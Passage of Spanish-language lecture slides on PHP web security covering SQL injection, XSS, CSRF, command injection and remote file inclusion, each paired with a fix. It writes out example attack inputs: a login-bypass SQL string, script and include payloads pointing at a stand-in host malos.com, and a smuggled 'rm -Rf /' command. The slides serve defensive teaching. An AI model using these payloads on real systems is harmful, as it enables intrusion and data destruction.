1. PHP SEGURIDAD (o cómo evitar que los malos nos jodan vivos)

7. El usuario puede modificar fácilmente el id de producto a visualizar, y poner, en vez de un número, cualquier otra cosa

8. ¡¡¡Asegurarse que $_GET['id'] es un número!!!

11. O usando plugins para el navegador

12. ¡10 minutos de ejercicio!

17. <, >, &, ', &quot; en html

18. ', &quot;, $, ;, ` al ejecutar comandos en la terminal

20. $sql = &quot;SELECT * FROM usuarios WHERE username='{$_POST['username']}' AND password='{$_POST['password']}'&quot;;

21. Si nos envían usuario 'pepe' y contraseña 'patata'

22. $sql = &quot;SELECT * FROM usuarios WHERE username='pepe' AND password='patata';

23. ¡Sin peligro!

25. Query generado: $sql = &quot;SELECT * FROM usuarios WHERE username='' OR id=1 -- ' AND password='blabla'&quot;

26. A partir de -- es comentario

27. ¡El atacante podría autenticarse como cualquier usuario!

29. Login sin usuario / contraseña

30. Obtener registros de la base de datos (datos bancarios, personales, passwords...)

31. Eliminar registros o tablas de la BD

34. $pdo->quote($variable)

37. El usuario puede escribir html que se interpretará como tal

38. Posibilidades enormes para un atacante, la más habitual insertar un <iframe> o <script> que cargue una página/script con código malévolo

39. XSS ataca a los usuarios de la web, no a la web en si misma (habitualmente)

41. Habitualmente: foros, perfiles de usuario

42. En caso que no pueda, igualmente podemos (bueno, nuestros usuarios) estar jodidos: vulnerable.php?id=<script src=&quot;http://malos.com/script.js&quot;> </script>

43. Usa un redireccionador tipo tinyurl para el ataque anterior

45. htmlspecialchars($texto_usuario);

48. En otra ventana del navegador, visita http://malos.com/, donde hay este código: <img src=&quot;http://mipagina.com/logout.php&quot; />

49. Esto provoca que el navegador del usuario lance una petición a mipagina.com/logout.php, que parece legítima, y desloguea al usuario

51. El caso del logout es más o menos inofensivo, aunque molesto

55. En la siguiente petición que haya, comprobar la existencia de dicho token (que se habrá enviado en la url o mediante un input hidden)

56. Si existe y es el mismo que el de la sesión, todo correcto: procesamos la petición

57. Si no existe o es diferente: posible ataque. No hacemos nada

61. El código de listar.php incluye: $comando = &quot;ls &quot;.$_GET['carpeta']; echo exec($comando);

63. La instrucción a ejecutar quedaría como: ls imagenes; rm -Rf /

64. 2 comandos! listar el contenido de la carpeta imágenes... y luego borrar todos los archivos del disco duro!

65. Evitarlo usando escapeshellcmd() y escapeshellarg()

67. Internamente, index.php realiza una cosa similar a require_once($_GET['pagina'].'.php');

68. Qué pasa si un atacante accede a index.php?pagina=http://malos.com/script

69. Bingo... la hemos jodido!

72. Poner un ./ al inicio del require (de esta forma se intentaría incluir './http://malos.com/script.php', y fallaría

75. Usuario root bd